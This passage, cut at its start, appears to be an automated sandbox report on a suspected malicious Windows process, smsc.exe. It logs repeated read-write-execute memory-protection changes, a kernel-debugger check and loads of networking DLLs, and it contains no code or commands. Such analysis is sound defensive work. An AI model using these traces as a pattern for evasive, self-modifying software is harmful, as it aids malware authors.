740	C:\WINDOWS\system32\smsc.exe	416060	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416064	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416068	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41606C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416070	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416074	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416078	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41607C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416080	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416084	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416088	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41608C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416090	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416094	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416098	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41609C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160A0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160A4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160A8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160AC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160B0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160B4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160B8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160BC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160C0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160C4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160C8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160CC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160D0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160D4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160D8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160DC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160E0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160E4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160E8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160EC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160F0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160F4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160F8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4160FC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416100	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416104	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416108	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	400000	1000	page execute and read and write	page readonly	success or wait	1	482B8D
740	C:\WINDOWS\system32\smsc.exe	400000	1000	page readonly	NULL	access violation	1	482BF7

System Activities:

System information queried
System info class	Completion	Count	Source Address
KernelDebuggerInformation	success or wait	1	40758F
BasicInformation	success or wait	1	408A8B
ProcessInformation	success or wait	1	415677

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1600085395
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 260000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1600636201
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 280000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1600748633
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 2D0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1600753293
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1600757832
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1600859197
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1600884357
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1601033062
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1601050983
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1601081360
Section loaded	Path: \KnownDlls\MPR.dll Access: write and read and execute Type: image Baseaddress: 71B20000 Size: 73728 Protection: read write Mapped to pid: own pid	success or wait	1601148644
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1601229984
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1601271468
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1601398903
Section loaded	Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid	success or wait	1601572380
Section loaded	Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1601637268
Section loaded	Path: C:\WINDOWS\system32\iphlpapi.dll Access: query and write and read and execute Type: image Baseaddress: 76D60000 Size: 102400 Protection: read write Mapped to pid: own pid	success or wait	1601660586
Section loaded	Path: \KnownDlls\WININET.dll Access: write and read and execute Type: image Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid	success or wait	1601679342
Section loaded	Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: image Baseaddress: 330000 Size: 36864 Protection: read write Mapped to pid: own pid	image not at base	1601699623
Section loaded	Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: image Baseaddress: 330000 Size: 36864 Protection: read write Mapped to pid: own pid	conflicting addresses	1601707729
Section loaded	Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: image Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid	success or wait	1601726544
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1601744025
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1601774766
Section loaded	Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: image Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid	success or wait	1601817114
Section loaded	Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid	success or wait	1601859500
Section loaded	Path: C:\WINDOWS\system32\mfc42.dll Access: query and write and read and execute Type: image Baseaddress: 73DD0000 Size: 987136 Protection: read write Mapped to pid: own pid	success or wait	1601891499
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1602104390
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1602111905
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1602113583
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 370000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1602166277
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 970000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1602191743
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 970000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1602253937
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1602259953
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 390000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1602302792
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 390000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1602308652
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 390000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1602317299
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: image Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	1602392582
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 970000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	1602440940
Memory allocated	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 3F0000 Length: 12FCF4 Allocation Type: null Protection: page read and write	success or wait	1603155109
Memory allocated	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 3F0000 Length: 12FCF4 Allocation Type: null Protection: page read and write	success or wait	1603181533
Memory allocated	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 3F0000 Length: 12FCF4 Allocation Type: null Protection: page read and write	success or wait	1603187294
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416600 Length: 1000 New Protection: page execute and read and write New Protection: page read and write	success or wait	1603207436
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603209602
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416614 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603210696
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416228 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603213429
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41622C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603214731
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416230 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603215943
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416234 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603220070
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416238 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603222553
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41623C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603223604
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416240 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603226168
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416244 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603227380
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416248 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603229226
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41624C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603233565
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416628 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603234907
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416138 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603235993
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41663C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603237751
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416218 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603238867
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41621C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603240340
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416220 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603250289
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416650 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603253810
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416280 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603255195
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416284 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603262102
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416288 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603263936
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41628C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603265531
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416290 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603267569
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416294 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603271428
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416298 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603272724
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41629C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603281431
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4162A0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603282865
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4162A4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603284297
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4162A8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603286000
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4162AC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603287277
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4162B0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603289679
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4162B4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603300577
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4162B8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603313170
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4162BC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603324393
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4162C0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603326069
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416664 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603332315
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4162C8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603337686
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416678 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603344551
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416254 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603346667
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416258 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603354847
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41625C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603357867
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416260 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603363904
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416264 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603365579
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416268 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603367886
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41626C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603374890
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416270 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603376126
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416274 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603378027
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416278 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603382237
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41668C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603383300
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41620C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603384379
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416210 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603385726
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4166A0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603386636
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4162D0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603387731
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4166B4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603394192
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416110 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603395128
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416114 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603396533
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416118 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603398686
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41611C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603400305
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416120 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603402185
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416124 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603406546
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416128 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603407638
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41612C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603408765
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416130 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603409919
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4166C8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603410820
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416140 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603411686
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416144 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603417716
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416148 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603419723
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41614C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603420660
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416150 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603427062
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416154 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603428862
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416158 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603430666
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41615C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603435074
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416160 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603438065
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416164 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603439314
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416168 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603441399
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41616C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603442406
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416170 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603444678
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416174 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603447874
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416178 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603449034
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41617C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603450205
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416180 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603455308
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416184 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603456664
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416188 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603457994
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41618C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603460673
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416190 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603461879
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416194 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603462961
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416198 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603478498
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41619C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603478729
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161A0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603478930
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161A4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603479128
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161A8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603479326
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161AC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603479997
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161B0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603483232
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161B4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603483437
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161B8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603483635
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161BC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603483832
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161C0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603484030
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161C4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603484580
